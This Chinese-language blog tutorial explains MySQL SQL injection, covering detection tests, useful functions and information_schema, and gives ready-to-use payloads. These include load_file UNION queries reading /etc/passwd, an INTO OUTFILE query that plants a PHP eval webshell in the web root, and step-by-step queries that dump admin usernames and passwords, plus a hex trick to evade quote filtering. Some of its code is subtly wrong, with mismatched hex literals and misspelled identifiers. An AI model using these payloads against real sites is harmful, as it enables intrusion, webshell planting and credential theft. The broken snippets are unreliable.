SQL注入详谈
文章目录[隐藏]
- 简介
- 原理
- 注入危害
- 注入分类
- SQL 注入挖掘
- MySQL 中常用函数
- MySQL 中 information_scheme 库
- load_file( )函数 读文件操作
- into outfile( )写文件操作
- MySQL 中 UNION 规则
简介
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
原理
针对 SQL 注入的攻击行为可描述为通过用户可控参数中注入 SQL 语法,破坏原有 SQL 结构,达到编写程序时意料之外结果的攻击行为。
其成因可以归结以下两个原因叠加造成的:
1、程序编写者在处理程序和数据库交互时,使用字符串拼接的方式构造 SQL 语句
2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到 SQL 语句中。
注入危害
攻击者利用 SQL 注入漏洞,可以获取数据库中的多种信息(例如:管理员后台密码),从而脱取数据库中内容(脱库)。在特别情况下,还可以修改数据库内容或者插入内容到数据库,如果数据库权限分配存在问题,或者数据库本身存在缺陷,那么攻击者可以通过 SQL 注入漏洞直接获取 webshell 或者服务器系统权限。
注入分类
1.根据数据类型
- 数字型注入
- 字符型注入
区别:
字符型:需要单引号闭合的就是字符型注入,并且需要注释掉后面的单引号 (注释符号:#,– – ,/*)
数值型:不需要单引号闭合,也不需要注释符号
根据注入语法
- UNION query SQL injection(可联合查询注入)
- Stacked queries SQL injection(可多语句查询注入)
- Error-based SQL injection(报错型注入)
- Boolean-based blind SQL injection(布尔型注入)
- Time-based blind SQL injection(基于时间延迟注入)
SQL 注入挖掘
- and 1=1 和 and 1=2 回显页面不同(整形判断)
- 单引号判断 ‘ 显示数据库错误信息或者页面回显不同(整形,字符串类型判断)
- (转义符)
- -1/+1 回显下一个或上一个页面(整型判断)(需要用%2b 转码+号)
- and sleep(5) (判断页面返回时间)
MySQL 中常用函数
- system_user() 系统用户名
- user() 数据库的用户名
- current_user() 当前用户名
- session_user() 连接数据库的用户名
- database() 数据库名
- version() MYSQL 数据库版本
- @@basedir 查看安装路径
- load_file(‘/etc/passwd’) MYSQL 读取本地文件的函数
MySQL 中 information_scheme 库
- SCHEMATA 表 字段:SCHEMA_NAME (数据库名字)
- TABLES 表 字段:TABLE_SCHEMA, TABLE_NAME
- COLUMNS 表 字段:TBALE_SCHEMA,TABLE_NAME,COLUMN_NAME
load_file( )函数 读文件操作
前提:
- 知道文件绝对路径
- 能够使用 union 查询
- 对 web 目录有读写权限
UNION SELECT 1 ,load_file ( '/etc/passwd' ) , 3 , 4 , 5 , 6#
UNION SELECT 1 ,load_file ( 'D://phpStudy//WWW//conn.php' ) , 3 , 4 , 5 , 6
UNION SELECT 1 ,load_file (0x443A2F2F70687053747564792F2F5757572F2F636F6E6E2E706870 ) , 3 , 4 , 5 , 6into outfile( )写文件操作
前提:
- 文件名必须全路径(绝对路径),
- 用户必须有写文件的权限
- 没有对 ‘ 单引号过滤
SELECT '<?php eval($_POST[1]); ?>' INTO OUTFILE ' D://phpStudy//WWW//hack.php 'MySQL 中 UNION 规则
- UNION 必须由两条或两条以上的 SELECT 语句组成,语句之间用关键字 UNION 分隔
- UNION 中的每个查询必须包含相同的列。
- UNION 会从查询结果集中自动去除了重复行。
对以上知识有所了解之后我们就可以学习一些在SQL注入时常用的一些操作
1.判断字段数
挖掘出注入点之后我们可以通过 order by 来判断表的字段数 例如: http://www.xxx.com/test.php?id=6 order by n
注:通常使用“order by N”,通过不断变换N的值,至刚好返回正常的网页,可得到当前表的字段数
2.判断显示位
http://www.xxx.com/test.php?id=6 union select 1,2,3,4,5,6
3.获取当数据库名称和当前连接数据库的用户
http://www.xxx.com/test.php?id=-1 union select 1,2,database(),4,5,6 http://www.xxx.com/test.php?id=-1 union select 1,2,user(),4,5,6
4.列出所有数据库
limit 一个一个打印出来库名 select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1 group_concat 一次性全部显示 select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA
5.列出(数据库:xss)中所有的表
limit 一个一个打印出来字段名 schema select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=’xss’ limit 0,1 group_concat 一次性全部显示 select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=0x674657374 注意:数据库名称可以用十六进制来代替字符串,这样可以绕过单引号的限制。
6.列出(数据库:xss 表:admins )中所有的字段
limit 一个一个打印出来 select COLIMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=’xss’ and TABLENAME=’admins ‘ limit 0,1 group_concat 一次性全部显示 select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA=0x74657374 and TABLE_NAME=0x61646d696e
7.列出(数据库:xss 表:admins )中的数据
limit 一个一个打印出来 select username,passwd from xss.admins limit 0,1 group_concat 把 一次性全部打印 select group_concat(concat(username,0x20,passwd)) from xss.admins
行云博客 - 免责申明 本站提供的一切软件、教程和内容信息仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我联系处理。敬请谅解!